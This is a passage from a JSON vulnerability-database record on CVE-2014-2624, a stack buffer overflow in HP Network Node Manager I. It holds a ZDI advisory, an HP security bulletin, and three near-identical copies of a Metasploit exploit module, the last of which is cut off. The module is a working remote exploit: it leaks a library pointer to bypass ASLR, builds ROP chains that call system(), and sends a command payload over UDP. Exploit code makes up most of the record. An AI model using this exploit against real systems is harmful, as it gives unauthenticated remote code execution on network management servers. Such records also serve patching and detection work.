"2016-11-09T00:18:06", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Network Node Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within ovopi.dll which listens by default on a UDP port 696. When parsing option -T, the process blindly copies user supplied data into a fixed-length stack buffer. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user.", "modified": "2014-11-09T00:00:00", "published": "2014-10-01T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-338", "id": "ZDI-14-338", "title": "Hewlett-Packard Network Node Manager ovopi.dll Option -T Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "description": "No description provided", "modified": "2014-09-15T00:00:00", "published": "2014-09-15T00:00:00", "id": "SECURITYVULNS:VULN:13965", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13965", "title": "HP Network Node Manager I code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:53", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04378450\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04378450\r\nVersion: 1\r\n\r\nHPSBMU03075 rev.1 - HP Network Node Manager I (NNMi) for Windows and Linux,\r\nRemote Execution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-09\r\nLast Updated: 2014-09-09\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Network Node\r\nManager I (NNMi) on Windows and Linux. This vulnerability could be exploited\r\nremotely to allow arbitrary code execution.\r\n\r\nReferences: CVE-2014-2624 (ZDI-CAN-2264, SSRT101519)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Network Node Manager I (NNMi) v9.0X, v9.1X and v9.2X for Windows and\r\nLinux.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-2624 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks d(-_-)b for working with TippingPoint.s\r\nZero Day Initiative for reporting this vulnerability to\r\nsecurity-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made the following Knowledge document information available to resolve\r\nthe vulnerability with HP NNMi.\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM01138724\r\n\r\nCustomers can also contact HP Support to request a copy of this document.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 September 2014 Initial release\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQPgn4ACgkQ4B86/C0qfVmELACg7s274gotY7HFltOk0z6SpxnE\r\n39kAoLE2k6l+wIFOI7u1P0iQolGxq7TC\r\n=W6jA\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-09-15T00:00:00", "published": "2014-09-15T00:00:00", "id": "SECURITYVULNS:DOC:31082", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31082", "title": "[security bulletin] HPSBMU03075 rev.1 - HP Network Node Manager I (NNMi) for Windows and Linux, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-03T00:14:37", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2014-10-02T00:00:00", "published": "2014-10-02T00:00:00", "id": "1337DAY-ID-22714", "href": "https://0day.today/exploit/description/22714", "type": "zdt", "title": "HP Network Node Manager I PMD Buffer Overflow Exploit", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::Udp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HP Network Node Manager I PMD Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The\r\n vulnerability exists in the pmd service, due to the insecure usage of functions like\r\n strcpy and strcat while handling stack_option packets with user controlled data. In\r\n order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from\r\n the stack and finally build the rop chain to avoid NX.\r\n },\r\n 'Author' =>\r\n [\r\n 'd(-_-)b', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-2624'],\r\n ['ZDI', '14-305']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'Space' => 3000,\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd cmd_bash',\r\n 'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'\r\n }\r\n },\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix',\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['HP NNMi 9.10 / CentOS 5',\r\n {\r\n # ptr to .rodata with format specifier\r\n #.rodata:0003BE86 aS_1 db '%s',0\r\n 'ov_offset' => 0x3BE86,\r\n :rop => :rop_hp_nnmi_9_10\r\n }\r\n ],\r\n ['HP NNMi 9.20 / CentOS 6',\r\n {\r\n # ptr to .rodata with format specifier\r\n #.rodata:0003C2D6 aS_1 db '%s',0\r\n 'ov_offset' => 0x3c2d8,\r\n :rop => :rop_hp_nnmi_9_20\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false, # true for HP NNMi 9.10, false for HP NNMi 9.20\r\n 'DisclosureDate' => 'Sep 09 2014',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options([ Opt::RPORT(7426) ], self.class)\r\n end\r\n \r\n def check\r\n header = [\r\n 0x2a5, # pmdmgr_init pkt\r\n 0x3cc, # signature\r\n 0xa0c, # signature\r\n 0xca8 # signature\r\n ].pack(\"V\")\r\n \r\n data = \"\\x00\" * (0xfa4 - header.length)\r\n \r\n pkt = header + data\r\n \r\n connect_udp\r\n udp_sock.put(pkt)\r\n res = udp_sock.timed_read(8, 1)\r\n if res.blank?\r\n # To mitigate MacOSX udp sockets behavior\r\n # see https://dev.metasploit.com/redmine/issues/7480\r\n udp_sock.put(pkt)\r\n res = udp_sock.timed_read(8)\r\n end\r\n disconnect_udp\r\n \r\n if res.blank?\r\n return Exploit::CheckCode::Unknown\r\n elsif res.length == 8 && res.unpack(\"V\").first == 0x2a5\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n end\r\n \r\n def exploit\r\n connect_udp\r\n # info leak with a \"proto_tbl\" packet\r\n print_status(\"Sending a 'proto_tbl' request...\")\r\n udp_sock.put(proto_tbl_pkt)\r\n \r\n res = udp_sock.timed_read(13964, 1)\r\n if res.blank?\r\n # To mitigate MacOSX udp sockets behavior\r\n # see https://dev.metasploit.com/redmine/issues/7480\r\n udp_sock.put(proto_tbl_pkt)\r\n res = udp_sock.timed_read(13964)\r\n end\r\n \r\n if res.blank?\r\n fail_with(Failure::Unknown, \"Unable to get a 'proto_tbl' response...\")\r\n end\r\n \r\n if target.name == 'Automatic'\r\n print_status(\"Fingerprinting target...\")\r\n my_target = auto_target(res)\r\n fail_with(Failure::NoTarget, \"Unable to autodetect target...\") if my_target.nil?\r\n else\r\n my_target = target\r\n fail_with(Failure::Unknown, \"Unable to leak libov base address...\") unless find_ov_base(my_target, res)\r\n end\r\n \r\n print_good(\"Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...\")\r\n \r\n # exploit with a \"stack_option_pkt\" packet\r\n udp_sock.put(stack_option_pkt(my_target, @ov_base))\r\n \r\n disconnect_udp\r\n end\r\n \r\n def rop_hp_nnmi_9_10(ov_base)\r\n rop = rand_text_alpha(775)\r\n rop << [0x808d7c1].pack(\"V\") # pop ebx ; pop ebp ; ret\r\n rop << [ov_base + 0x481A8].pack(\"V\") # ebx: libov .got\r\n rop << [0x8096540].pack(\"V\") # ptr to .data where user controlled string will be stored:\r\n # \"PMD Stack option specified, but stack not available (user_controlled)\"\r\n rop << [0x808d7c2].pack(\"V\") # pop ebp # ret\r\n rop << [0x08096540 + 4732].pack(\"V\") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)\r\n rop << [ov_base + 0x1D692].pack(\"V\") # ptr to 'call _system' sequence:\r\n #.text:0001D692 lea eax, [ebp+dest]\r\n #.text:0001D698 push eax ; command\r\n #.text:0001D699 call _system\r\n rop\r\n end\r\n \r\n def rop_hp_nnmi_9_20(ov_base)\r\n rop = rand_text_alpha(775)\r\n rop << [0x808dd70].pack(\"V\") # pop eax ; pop ebx ; pop ebp ; ret\r\n rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack(\"V\") # eax: ptr to 'call _system' sequence\r\n #.text:0001DAE6 lea eax, [ebp+dest] (dest = -0x1028)\r\n #.text:0001DAEC push eax ; command\r\n #.text:0001DAED call _system\r\n rop << [0x08097160].pack(\"V\") # ebx: ptr to .data where user controlled string will be stored:\r\n # \"PMD Stack option specified, but stack not available (user_controlled)\"\r\n rop << rand_text_alpha(4) # ebp: padding\r\n rop << [0x804fb86].pack(\"V\") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)\r\n rop << [0x8049ac4].pack(\"V\") # xchg eax, edi ; ret\r\n rop << [0x808dd70].pack(\"V\") # pop eax ; pop ebx ; pop ebp ; ret\r\n rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack(\"V\") # eax: libov .got base\r\n rop << rand_text_alpha(4) # ebx: padding\r\n rop << [0x8097160 + 4764].pack(\"V\") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)\r\n rop << [0x804fb86].pack(\"V\") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)\r\n rop << [0x805a58d].pack(\"V\") # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)\r\n rop << [0x8049ac4].pack(\"V\") # xchg eax, edi ; ret ; (eax: call to system sequence from libov)\r\n rop << [0x80528BC].pack(\"V\") # jmp eax\r\n \r\n rop\r\n end\r\n \r\n def stack_option_pkt(t, ov_base)\r\n hdr = [0x2a9].pack(\"V\") # stack_option packet\r\n data = \"-SA\" # stack name (invalid one 'A')\r\n data << \";\" # separator\r\n data << self.send(t[:rop], ov_base) # malformed stack options\r\n data << payload.encoded\r\n data << \";\\n\"\r\n data << \"\\x00\" * (0xfa4 - data.length - hdr.length)\r\n \r\n hdr + data\r\n end\r\n \r\n def proto_tbl_pkt\r\n hdr = [0x2aa].pack(\"V\") # proto_tbl packet\r\n data = \"\\x00\" * (0xfa4 - hdr.length)\r\n \r\n hdr + data\r\n end\r\n \r\n def base(address, offset)\r\n address - offset\r\n end\r\n \r\n def find_ov_base(t, data)\r\n print_status(\"Searching #{t.name} pointers...\")\r\n i = 0\r\n data.unpack(\"V*\").each do |int|\r\n if base(int, t['ov_offset']) % 0x1000 == 0\r\n print_status(\"Pointer 0x#{int.to_s(16)} found at offset #{i * 4}\")\r\n @ov_base = base(int, t['ov_offset'])\r\n return true\r\n end\r\n i = i + 1\r\n end\r\n \r\n false\r\n end\r\n \r\n def auto_target(data)\r\n targets.each do |t|\r\n next if t.name == 'Automatic'\r\n if find_ov_base(t, data)\r\n return t\r\n end\r\n end\r\n \r\n nil\r\n end\r\n \r\nend\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22714"}], "exploitdb": [{"lastseen": "2016-02-04T00:06:06", "bulletinFamily": "exploit", "description": "HP Network Node Manager I PMD Buffer Overflow. CVE-2014-2624. Remote exploit for linux platform", "modified": "2014-10-02T00:00:00", "published": "2014-10-02T00:00:00", "id": "EDB-ID:34866", "href": "https://www.exploit-db.com/exploits/34866/", "type": "exploitdb", "title": "HP Network Node Manager I PMD Buffer Overflow", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HP Network Node Manager I PMD Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The\r\n vulnerability exists in the pmd service, due to the insecure usage of functions like\r\n strcpy and strcat while handling stack_option packets with user controlled data. In\r\n order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from\r\n the stack and finally build the rop chain to avoid NX.\r\n },\r\n 'Author' =>\r\n [\r\n 'd(-_-)b', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-2624'],\r\n ['ZDI', '14-305']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'Space' => 3000,\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd cmd_bash',\r\n 'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'\r\n }\r\n },\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix',\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['HP NNMi 9.10 / CentOS 5',\r\n {\r\n # ptr to .rodata with format specifier\r\n #.rodata:0003BE86 aS_1 db '%s',0\r\n 'ov_offset' => 0x3BE86,\r\n :rop => :rop_hp_nnmi_9_10\r\n }\r\n ],\r\n ['HP NNMi 9.20 / CentOS 6',\r\n {\r\n # ptr to .rodata with format specifier\r\n #.rodata:0003C2D6 aS_1 db '%s',0\r\n 'ov_offset' => 0x3c2d8,\r\n :rop => :rop_hp_nnmi_9_20\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false, # true for HP NNMi 9.10, false for HP NNMi 9.20\r\n 'DisclosureDate' => 'Sep 09 2014',\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([ Opt::RPORT(7426) ], self.class)\r\n end\r\n\r\n def check\r\n header = [\r\n 0x2a5, # pmdmgr_init pkt\r\n 0x3cc, # signature\r\n 0xa0c, # signature\r\n 0xca8 # signature\r\n ].pack(\"V\")\r\n\r\n data = \"\\x00\" * (0xfa4 - header.length)\r\n\r\n pkt = header + data\r\n\r\n connect_udp\r\n udp_sock.put(pkt)\r\n res = udp_sock.timed_read(8, 1)\r\n if res.blank?\r\n # To mitigate MacOSX udp sockets behavior\r\n # see https://dev.metasploit.com/redmine/issues/7480\r\n udp_sock.put(pkt)\r\n res = udp_sock.timed_read(8)\r\n end\r\n disconnect_udp\r\n\r\n if res.blank?\r\n return Exploit::CheckCode::Unknown\r\n elsif res.length == 8 && res.unpack(\"V\").first == 0x2a5\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n connect_udp\r\n # info leak with a \"proto_tbl\" packet\r\n print_status(\"Sending a 'proto_tbl' request...\")\r\n udp_sock.put(proto_tbl_pkt)\r\n\r\n res = udp_sock.timed_read(13964, 1)\r\n if res.blank?\r\n # To mitigate MacOSX udp sockets behavior\r\n # see https://dev.metasploit.com/redmine/issues/7480\r\n udp_sock.put(proto_tbl_pkt)\r\n res = udp_sock.timed_read(13964)\r\n end\r\n\r\n if res.blank?\r\n fail_with(Failure::Unknown, \"Unable to get a 'proto_tbl' response...\")\r\n end\r\n\r\n if target.name == 'Automatic'\r\n print_status(\"Fingerprinting target...\")\r\n my_target = auto_target(res)\r\n fail_with(Failure::NoTarget, \"Unable to autodetect target...\") if my_target.nil?\r\n else\r\n my_target = target\r\n fail_with(Failure::Unknown, \"Unable to leak libov base address...\") unless find_ov_base(my_target, res)\r\n end\r\n\r\n print_good(\"Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...\")\r\n\r\n # exploit with a \"stack_option_pkt\" packet\r\n udp_sock.put(stack_option_pkt(my_target, @ov_base))\r\n\r\n disconnect_udp\r\n end\r\n\r\n def rop_hp_nnmi_9_10(ov_base)\r\n rop = rand_text_alpha(775)\r\n rop << [0x808d7c1].pack(\"V\") # pop ebx ; pop ebp ; ret\r\n rop << [ov_base + 0x481A8].pack(\"V\") # ebx: libov .got\r\n rop << [0x8096540].pack(\"V\") # ptr to .data where user controlled string will be stored:\r\n # \"PMD Stack option specified, but stack not available (user_controlled)\"\r\n rop << [0x808d7c2].pack(\"V\") # pop ebp # ret\r\n rop << [0x08096540 + 4732].pack(\"V\") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)\r\n rop << [ov_base + 0x1D692].pack(\"V\") # ptr to 'call _system' sequence:\r\n #.text:0001D692 lea eax, [ebp+dest]\r\n #.text:0001D698 push eax ; command\r\n #.text:0001D699 call _system\r\n rop\r\n end\r\n\r\n def rop_hp_nnmi_9_20(ov_base)\r\n rop = rand_text_alpha(775)\r\n rop << [0x808dd70].pack(\"V\") # pop eax ; pop ebx ; pop ebp ; ret\r\n rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack(\"V\") # eax: ptr to 'call _system' sequence\r\n #.text:0001DAE6 lea eax, [ebp+dest] (dest = -0x1028)\r\n #.text:0001DAEC push eax ; command\r\n #.text:0001DAED call _system\r\n rop << [0x08097160].pack(\"V\") # ebx: ptr to .data where user controlled string will be stored:\r\n # \"PMD Stack option specified, but stack not available (user_controlled)\"\r\n rop << rand_text_alpha(4) # ebp: padding\r\n rop << [0x804fb86].pack(\"V\") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)\r\n rop << [0x8049ac4].pack(\"V\") # xchg eax, edi ; ret\r\n rop << [0x808dd70].pack(\"V\") # pop eax ; pop ebx ; pop ebp ; ret\r\n rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack(\"V\") # eax: libov .got base\r\n rop << rand_text_alpha(4) # ebx: padding\r\n rop << [0x8097160 + 4764].pack(\"V\") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)\r\n rop << [0x804fb86].pack(\"V\") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)\r\n rop << [0x805a58d].pack(\"V\") # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)\r\n rop << [0x8049ac4].pack(\"V\") # xchg eax, edi ; ret ; (eax: call to system sequence from libov)\r\n rop << [0x80528BC].pack(\"V\") # jmp eax\r\n\r\n rop\r\n end\r\n\r\n def stack_option_pkt(t, ov_base)\r\n hdr = [0x2a9].pack(\"V\") # stack_option packet\r\n data = \"-SA\" # stack name (invalid one 'A')\r\n data << \";\" # separator\r\n data << self.send(t[:rop], ov_base) # malformed stack options\r\n data << payload.encoded\r\n data << \";\\n\"\r\n data << \"\\x00\" * (0xfa4 - data.length - hdr.length)\r\n\r\n hdr + data\r\n end\r\n\r\n def proto_tbl_pkt\r\n hdr = [0x2aa].pack(\"V\") # proto_tbl packet\r\n data = \"\\x00\" * (0xfa4 - hdr.length)\r\n\r\n hdr + data\r\n end\r\n\r\n def base(address, offset)\r\n address - offset\r\n end\r\n\r\n def find_ov_base(t, data)\r\n print_status(\"Searching #{t.name} pointers...\")\r\n i = 0\r\n data.unpack(\"V*\").each do |int|\r\n if base(int, t['ov_offset']) % 0x1000 == 0\r\n print_status(\"Pointer 0x#{int.to_s(16)} found at offset #{i * 4}\")\r\n @ov_base = base(int, t['ov_offset'])\r\n return true\r\n end\r\n i = i + 1\r\n end\r\n\r\n false\r\n end\r\n\r\n def auto_target(data)\r\n targets.each do |t|\r\n next if t.name == 'Automatic'\r\n if find_ov_base(t, data)\r\n return t\r\n end\r\n end\r\n\r\n nil\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34866/"}], "metasploit": [{"lastseen": "2018-08-27T17:34:16", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The vulnerability exists in the pmd service, due to the insecure usage of functions like strcpy and strcat while handling stack_option packets with user controlled data. In order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from the stack and finally build the ROP chain to avoid NX.", "modified": "2017-07-24T13:26:21", "published": "2014-09-24T05:22:16", "id": "MSF:EXPLOIT/LINUX/MISC/HP_NNMI_PMD_BOF", "href": "", "type": "metasploit", "title": "HP Network Node Manager I PMD Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP Network Node Manager I PMD Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The\n vulnerability exists in the pmd service, due to the insecure usage of functions like\n strcpy and strcat while handling stack_option packets with user controlled data. In\n order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from\n the stack and finally build the ROP chain to avoid NX.\n },\n 'Author' =>\n [\n 'd(-_-)b', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-2624'],\n ['ZDI', '14-305']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 3000,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'\n }\n },\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'Targets' =>\n [\n ['Automatic', {}],\n ['HP NNMi 9.10 / CentOS 5',\n {\n # ptr to .rodata with format specifier\n #.rodata:0003BE86 aS_1 db '%s',0\n 'ov_offset' => 0x3BE86,\n :rop => :rop_hp_nnmi_9_10\n }\n ],\n ['HP NNMi 9.20 / CentOS 6',\n {\n # ptr to .rodata with format specifier\n #.rodata:0003C2D6 aS_1 db '%s',0\n 'ov_offset' => 0x3c2d8,\n :rop => :rop_hp_nnmi_9_20\n }\n ]\n ],\n 'Privileged' => false, # true for HP NNMi 9.10, false for HP NNMi 9.20\n 'DisclosureDate' => 'Sep 09 2014',\n 'DefaultTarget' => 0\n ))\n\n register_options([ Opt::RPORT(7426) ])\n end\n\n def check\n header = [\n 0x2a5, # pmdmgr_init pkt\n 0x3cc, # signature\n 0xa0c, # signature\n 0xca8 # signature\n ].pack(\"V\")\n\n data = \"\\x00\" * (0xfa4 - header.length)\n\n pkt = header + data\n\n connect_udp\n udp_sock.put(pkt)\n res = udp_sock.timed_read(8, 1)\n if res.blank?\n # To mitigate MacOSX udp sockets behavior\n udp_sock.put(pkt)\n res = udp_sock.timed_read(8)\n end\n disconnect_udp\n\n if res.blank?\n return Exploit::CheckCode::Unknown\n elsif res.length == 8 && res.unpack(\"V\").first == 0x2a5\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n connect_udp\n # info leak with a \"proto_tbl\" packet\n print_status(\"Sending a 'proto_tbl' request...\")\n udp_sock.put(proto_tbl_pkt)\n\n res = udp_sock.timed_read(13964, 1)\n if res.blank?\n # To mitigate MacOSX udp sockets behavior\n udp_sock.put(proto_tbl_pkt)\n res = udp_sock.timed_read(13964)\n end\n\n if res.blank?\n fail_with(Failure::Unknown, \"Unable to get a 'proto_tbl' response...\")\n end\n\n if target.name == 'Automatic'\n print_status(\"Fingerprinting target...\")\n my_target = auto_target(res)\n fail_with(Failure::NoTarget, \"Unable to autodetect target...\") if my_target.nil?\n else\n my_target = target\n fail_with(Failure::Unknown, \"Unable to leak libov base address...\") unless find_ov_base(my_target, res)\n end\n\n print_good(\"Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...\")\n\n # exploit with a \"stack_option_pkt\" packet\n udp_sock.put(stack_option_pkt(my_target, @ov_base))\n\n disconnect_udp\n end\n\n def rop_hp_nnmi_9_10(ov_base)\n rop = rand_text_alpha(775)\n rop << [0x808d7c1].pack(\"V\") # pop ebx ; pop ebp ; ret\n rop << [ov_base + 0x481A8].pack(\"V\") # ebx: libov .got\n rop << [0x8096540].pack(\"V\") # ptr to .data where user controlled string will be stored:\n # \"PMD Stack option specified, but stack not available (user_controlled)\"\n rop << [0x808d7c2].pack(\"V\") # pop ebp # ret\n rop << [0x08096540 + 4732].pack(\"V\") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)\n rop << [ov_base + 0x1D692].pack(\"V\") # ptr to 'call _system' sequence:\n #.text:0001D692 lea eax, [ebp+dest]\n #.text:0001D698 push eax ; command\n #.text:0001D699 call _system\n rop\n end\n\n def rop_hp_nnmi_9_20(ov_base)\n rop = rand_text_alpha(775)\n rop << [0x808dd70].pack(\"V\") # pop eax ; pop ebx ; pop ebp ; ret\n rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack(\"V\") # eax: ptr to 'call _system' sequence\n #.text:0001DAE6 lea eax, [ebp+dest] (dest = -0x1028)\n #.text:0001DAEC push eax ; command\n #.text:0001DAED call _system\n rop << [0x08097160].pack(\"V\") # ebx: ptr to .data where user controlled string will be stored:\n # \"PMD Stack option specified, but stack not available (user_controlled)\"\n rop << rand_text_alpha(4) # ebp: padding\n rop << [0x804fb86].pack(\"V\") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)\n rop << [0x8049ac4].pack(\"V\") # xchg eax, edi ; ret\n rop << [0x808dd70].pack(\"V\") # pop eax ; pop ebx ; pop ebp ; ret\n rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack(\"V\") # eax: libov .got base\n rop << rand_text_alpha(4) # ebx: padding\n rop << [0x8097160 + 4764].pack(\"V\") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)\n rop << [0x804fb86].pack(\"V\") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)\n rop << [0x805a58d].pack(\"V\") # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)\n rop << [0x8049ac4].pack(\"V\") # xchg eax, edi ; ret ; (eax: call to system sequence from libov)\n rop << [0x80528BC].pack(\"V\") # jmp eax\n\n rop\n end\n\n def stack_option_pkt(t, ov_base)\n hdr = [0x2a9].pack(\"V\") # stack_option packet\n data = \"-SA\" # stack name (invalid one 'A')\n data << \";\" # separator\n data << self.send(t[:rop], ov_base) # malformed stack options\n data << payload.encoded\n data << \";\\n\"\n data << \"\\x00\" * (0xfa4 - data.length - hdr.length)\n\n hdr + data\n end\n\n def 